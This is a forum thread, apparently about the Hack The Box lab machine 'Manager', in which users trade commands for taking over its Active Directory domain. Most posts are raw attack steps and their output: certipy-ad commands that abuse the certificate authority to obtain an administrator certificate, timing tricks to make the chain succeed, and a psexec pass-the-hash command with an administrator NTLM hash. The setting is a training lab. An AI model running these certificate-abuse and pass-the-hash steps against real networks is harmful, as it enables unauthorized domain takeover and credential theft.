Posts: 6
Threads: 0
Joined: Aug 2023
Oct 24, 2023, 04:51 PM
(This post was last modified: Oct 24, 2023, 04:51 PM by juicemon.)
(Oct 24, 2023, 03:02 PM)godzilla Wrote: certipy-ad auth -pfx cheng.pfx -domain manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*]Using principal: cheng@manager.htb
[*]Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
any one help me why its...
It was the same for me, but it was confirmed that it was a system setting problem. There's no time-synchronization error anymore.
Try it as below and try again.
sudo timedatectl set-ntp 0
sudo rdate -n [Machine IP]
Posts: 6
Threads: 0
Joined: Oct 2023
Posts: 3
Threads: 0
Joined: Oct 2023
this machine should be ranked very easy
Posts: 5
Threads: 0
Joined: Oct 2023
what to do after getting raven credentials? I found an xml file using impacket-mssqlserver but i dont know how to download it. can I get some hints?
Posts: 29
Threads: 5
Joined: Sep 2023
(Oct 25, 2023, 04:07 PM)keepalive Wrote: what to do after getting raven credentials? I found an xml file using impacket-mssqlserver but i dont know how to download it. can I get some hints?
you dont need any .xml files, you just need to connect as raven using evil-winrm and optionally do bloodhound
Posts: 57
Threads: 2
Joined: Aug 2023
Hi everybody. This is commands:
certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'raven_pass'
certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'raven_pass'
certipy-ad req -username raven@manager.htb -password 'raven_pass' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 30 -username raven@manager.htb -password 'raven_pass'
result: [-] Got access denied trying to issue certificate
Other commands:
certipy-ad req -username raven@manager.htb -password 'raven_pass' -ca 'manager-DC01-CA' -target manager.htb -retrieve 29
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
What is problem? PLS help. Thanks advance
Posts: 6
Threads: 0
Joined: Sep 2023
(Oct 26, 2023, 11:34 AM)monkeythefirst Wrote: Hi everybody. This is commands:
certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'raven_pass'
certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'raven_pass'
certipy-ad req -username raven@manager.htb -password 'raven_pass' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 30 -username raven@manager.htb -password 'raven_pass'
result: [-] Got access denied trying to issue certificate
Other commands:
certipy-ad req -username raven@manager.htb -password 'raven_pass' -ca 'manager-DC01-CA' -target manager.htb -retrieve 29
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
I had the same error when it did it, I did two things that worked for me, first I used: sudo sntp -sS manager.htb
certipy-ad ca -ca 'manager-DC01- CA' -add-officer raven -username 'raven@manager.htb' -password 'password' -dc-ip 10.10.11.236 -debug
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 16 -username raven@manager.htb -password 'password'
Posts: 9
Threads: 0
Joined: Sep 2023
For everyone that has not made it yet use this command cause if you aint made it now yea. But it will give you full root
python3 psexec.py manager.htb/administrator remanager.htb -hashes aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef -dc-ip 10.10.11.***
Posts: 9
Threads: 1
Joined: Sep 2023
(Oct 21, 2023, 08:20 PM)cavour13 Wrote: Roooooted 
got raven cred what should i do next
Posts: 1
Threads: 0
Joined: Nov 2023
(Oct 27, 2023, 01:27 AM)SrDuckMa Wrote: (Oct 26, 2023, 11:34 AM)monkeythefirst Wrote: Hi everybody. This is commands:
certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'raven_pass'
certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'raven_pass'
certipy-ad req -username raven@manager.htb -password 'raven_pass' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 30 -username raven@manager.htb -password 'raven_pass'
result: [-] Got access denied trying to issue certificate
Other commands:
certipy-ad req -username raven@manager.htb -password 'raven_pass' -ca 'manager-DC01-CA' -target manager.htb -retrieve 29
certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
I had the same error when it did it, I did two things that worked for me, first I used: sudo sntp -sS manager.htb
to synchronize the system clock and the second thing is to be fast since you use
certipy-ad ca -ca 'manager-DC01- CA' -add-officer raven -username 'raven@manager.htb' -password 'password' -dc-ip 10.10.11.236 -debug
until:
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 16 -username raven@manager.htb -password 'password'
sorry for my English
Thanks
It really works if you do it as fast as possible(in one line command using &&). But how did you get it? In hacktricks(or other resources) didn`t mentioned that you have 'race conditions' or it should be completed in one second.
|
